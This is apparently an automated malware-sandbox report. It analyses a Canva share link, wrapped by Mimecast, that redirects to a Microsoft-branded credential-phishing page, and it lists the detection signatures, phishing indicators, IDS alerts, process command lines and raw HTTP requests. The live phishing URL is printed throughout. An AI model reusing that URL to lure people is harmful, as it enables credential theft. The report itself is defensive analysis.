Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com

Overview

General Information

Sample URL:https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com
Analysis ID:1559505
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
AI detected landing page (webpage, office document or email)
Detected suspicious crossdomain redirect
HTML body contains low number of good links
HTML body contains password input but no form action
HTML body with high number of embedded images detected
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Javascript checks online IP of machine
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • chrome.exe (PID: 616 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 380 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
    • chrome.exe (PID: 5584 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4272 --field-trial-handle=2480,i,5302738435482969392,3902494254150986920,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • chrome.exe (PID: 5308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com" MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-11-20T16:02:06.081494+010020221121Exploit Kit Activity Detected192.168.2.1249911172.217.21.36443TCP
2024-11-20T16:02:08.817960+010020221121Exploit Kit Activity Detected192.168.2.1249923142.250.181.68443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comSlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev' does not match the legitimate domain 'microsoft.com'., The domain 'ar-io.dev' is not associated with Microsoft and appears to be a third-party domain., The URL contains a long, random-looking subdomain which is a common tactic used in phishing to obscure the true nature of the site., The presence of a random string in the subdomain is suspicious and indicative of phishing. DOM: 2.8.pages.csv
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft' is classified as 'wellknown'., The URL '6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev' does not match the legitimate domain 'microsoft.com'., The URL contains a random string and a domain extension '.dev', which is unusual for a Microsoft-related domain., The presence of a random string in the subdomain is a common tactic used in phishing to obscure the true nature of the site., The domain 'ar-io.dev' does not have any known association with Microsoft. DOM: 2.9.pages.csv
Source: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorJoe Sandbox AI: Page contains button: 'Download' Source: '1.4.pages.csv'
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: Number of links: 0
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: Total embedded image size: 123322
Source: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editorHTTP Parser: Base64 decoded: 1732114887.000000
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: Title: Sharing Link Validation does not match URL
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: Invalid link: Privacy & Cookies
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: Invalid link: Privacy & Cookies
Source: https://cdn.metadata.io/site-insights.jsHTTP Parser: (function () { /** * @type {string} key for the visitor id cookie. */ const visitoridkey = "metadata_visitor_id"; /** * @type {string} key for the session id cookie. */ const sessionidkey = "metadata_session_id"; /** * @type {string} ip address of the client. */ let ip; /** * account configuration object. */ const config = { invalid: true }; /** * options object. */ const opts = { /** * @type {string} base url for the cdn. */ cdnbaseurl: "https://cdn.metadata.io/pixel/config", /** * @type {string} base url for the api. */ baseurl: "https://api-gw.metadata.io", /** * @type {string} account id. */ accountid: null }; /** * get the value of a cookie. * @param {string} key - the key of the cookie. * @returns {string|null} the value of the cookie, or null if not found. */ const getcookievalue = (key) => { const cookie = document.cookie.split("; ").find(function (cookie) { ...
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: <input type="password" .../> found
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No favicon
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No favicon
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No favicon
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No <meta name="author".. found
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No <meta name="author".. found
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No <meta name="copyright".. found
Source: https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8CGeYTDpQv6SFNO4jcQyvZPSCjxO2TkhfxZ3B76bmuIHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.12:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.12:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.12:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.12:49930 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: www.canva.com to https://6aqz4yjq5fbp5equ2o4i3rbsxwj5ecr4j3mtsil7cz3qppu3tlra.ar-io.dev/8cgeytdpqv6sfno4jcqyvzpscjxo2tkhfxz3b76bmui
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.12:49911 -> 172.217.21.36:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.12:49923 -> 142.250.181.68:443
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.60
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: global trafficHTTP traffic detected: GET /s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.com HTTP/1.1Host: url.us.m.mimecastprotect.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r/Vg0t0PTdWB03w6YzIYq7rjxC1YfGqzMu5H-q2MB0uKh_5gy4emB1DoIFuQ3HEQLzivQGoOZ2z4WTQGj9iVnnpR5ZhFgtsRAmFNXaDTdRAJ8s8QSfI8YK7NGFWFAWLDD2heW0VODyavLe3Bu5Zdfbozkx5FM3afQVtBX39N06ZhcEN_SJmRVmYf10wKDEShZOqG5BIQq8uLK02EdFpfO0SgWdzbZth6KXT8qb4iC7K69snz3DOYU6_3vYNXrL06op70oVsW7TQWlI3darB4rifqJASQHCJM_CjneVLpDbLfxCiwizyLdH4ZNS-QzNKw68KzB0PJKAQoR9DbvHrsxPKyybDt4j4KTcrAZwxtzSLjpGAkmtC8NXcO-xI3a4XqHxAvUASfMtUeAMXtFmFBJuLTAMXM_QlZbswiKfoyNBlGriVPS5BNKhpISP6aTJHk1zLdejH-gynqhCTWsdOtrYUEcmCSFBgJrGpcJhs_stD1Ij6_k1Z0vug2JnjN5Mym3jVe6s_uzyVkW90OSQfNtMZWl0bAab6LP6JQrxZQFHuygoEdcWvfXxcNGxLS1RhVxrdgBuOFj3qA74_t4T6pN71XuPhjq5jU37orHc8jWouDTiSWFqobE7TebeML11i0som-mVtQK38RqT6gIAfEdvBVzy1-eNfNDGpduRqpdQSWDtx82wAW02hb5SEVoOs3aCQy_fzWXWVcT6jjbr3_qllB1DzaiJRUXt6hJv19SCRHUMGIv1k6caAa7xCmiCxUdH-97vJm1IEUnXKqMX-Yfa74t_-QZQLeIsbJs8CJEDB9JP_qF18g1BTqoS7SuEpnnNQ4ZaWqziQOnCi7roJmKXErvckq9oX9dUBQZTqcO9nZK3X6lGTQZYhxuSLJpfqnplxhOGaiF0TST8rJNmx1jN1ctGsa5ZC0CYgf1-OF7OYDkbWJdR5BeGgpzCv_Iz-BSFaQC2opCP62Dk9z_h8jBGUnE3a8z484fBTuYyqriky8DNZHUi5Bw71laziuQ7gyt3iuIDjBKcPW3bZRgWQ-8U0TELrLjW_LHCXhR6y_uFgK5qvTkQbZFwvvtvmbAwHJBcd1eZb628-jRVkzEWidMv8GSbBZyzAVL-XBLixifHjbj5fjNociqv1F5uTFGRWa1rEA1y_6xvlNg_CTXm3JQYEIt5HtUIq892bBAcfmwwmEbSrfr0UJVJgOh7OpzrL03XOQZNfvmbXkOBDwjDo4Qf7H0XlKZDXbN8b0ffV7c35KbW0PSJx1ohy4xryPXQUpxaIuCBb_ep5my3NzZPUWs_y_xSfHA8BE-Z8d6uEGTBOR2cdWYZaMusqRZwGsY4fISNGmsOT1m5ZtqoWyHsBOMfFP2QCPAKh4ehQNYdjMcLjgHU3NzE-BIvy9ABX3-eu-vDK-kkwOITNvghXqP35ivEcPvuqMBw9C8d1qiEIXsKG5hST3JbdFkcYkegmsuUq6fo0BHBAJLDbt0fzI0MWXrgP2uHGMjb_iCHIbXoewck-QZPhukUgCheT9ZVmDpnIKulfbaFgdu1FTB4nCinhSPA34UtoM1OS8OnmvIC5efQ5PFNWtYRHwLJCqqzsMbIXV-aa0me2aX7PaIQebcp6SjNfOYQxARGK1khbGzjy7cEIeYicSy0omo4ExHomq52Z4C6v0TIXGeTG7FLlVmFgvIWqh7b4NlJNUgD-foVWnIDJXcrikOsZDkFx0ONJvqNZdxvPz0mmA6la205cIv7gmgPk51J3TGctzl94R7JtfrOXIcBuOLFQVuOMWHeQzWe9EuxMNizlOYr9RRjXEBufhr3tOWdeJk9kxr3nue2m83KYUWRIbkq5gfJRraJx6JkrwJcO2wdt42fD3QrqykHLtjCYL_fujYdHDiY1FYhfM4VyDmdnx1ZHfJjjWrvFVzjVSH1hFegtTd1ShX4wuw4r8m0SHNcqW3dEAxD5hRAMkSnyQtVqpALFhaA95asZ7j2TPka_lfzLz3fj18D23QKb51Wl2EtBjGebabDlGHPswsev5lokDiOlw_Mvd92QG97oARtu8LHtyptBPuTZ7cbCZVyvw-ZRLOzGjSR6hGBu_LPNk790EPom4CrukrSeOmse1qRIMgvzO8ZqO9D39_ec76aJK-U-LFwJZ6R3plpvHvfmtlU3E98pbzwgH2hGsTh8pKmGNKFqT0925ebNXhTWcu-ydNeoKbmWvw-IuuLyFz3Y-2Eb20ITAJFY5rJ09nn_G6zcx0K0EI4axS6tQzVojV6SWFbvpdKfPXumUBkz0AiQVq9liKRLKCTNjiCYso90j0AvLqOzYC0mQko3mWKVLu9Nqu3_TuuoQTD5McrxKkC4JSJ5OZIEY_uCvL17D4LGzp9YgSSINWQ9jRoggtI7kXJKWhNB4HNTMUWQu3Repn3iWqqtYv0UiQZmHfoZfNIqWC-AaUkfX5RxM9JWuKT_9mOcjTN3Bs-NtV9pZtX5RL_ylsLOeMyOTvcYO81k9tXZ9r8zX7wBPKP-Ffi0ZHtRlMjB4Rt42Dy8jQJEICeV_3BrAl7rBDRQxQRFfcZDpPAOKeSt-TL7NnePI14NxokYL-f0z4te7Q8KX_6Fg6KnaqOXKtHyNcXtpXLgbATu85kKt3A6KaqOUjFeAv3jwhmmyQTF7T_3KPV68Ni8zx3VkxE5IY9kG-CVx1qc_KPVFht0rsd HTTP/1.1Host: url.us.m.mimecastprotect.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/
Source: global trafficHTTP traffic detected: GET /design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor HTTP/1.1Host: www.canva.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /web/228115b6a6e5e8e3.ltr.css HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/bc9c3915a07295cb.en.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/1c5520ae304c8de4.strings.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/51bb9612ee6d1bb7.runtime.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/ad9231ed6706fadf.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/4af0e43f4ef393f1.vendor.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/lib/sentry/7.16.0.min.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/7aa7a229de4ac1cc.js HTTP/1.1Host: static.canva.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.canva.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.canva.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web/bc9c3915a07295cb.en.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/1c5520ae304c8de4.strings.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
Source: global trafficHTTP traffic detected: GET /web/51bb9612ee6d1bb7.runtime.js HTTP/1.1Host: static.canva.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
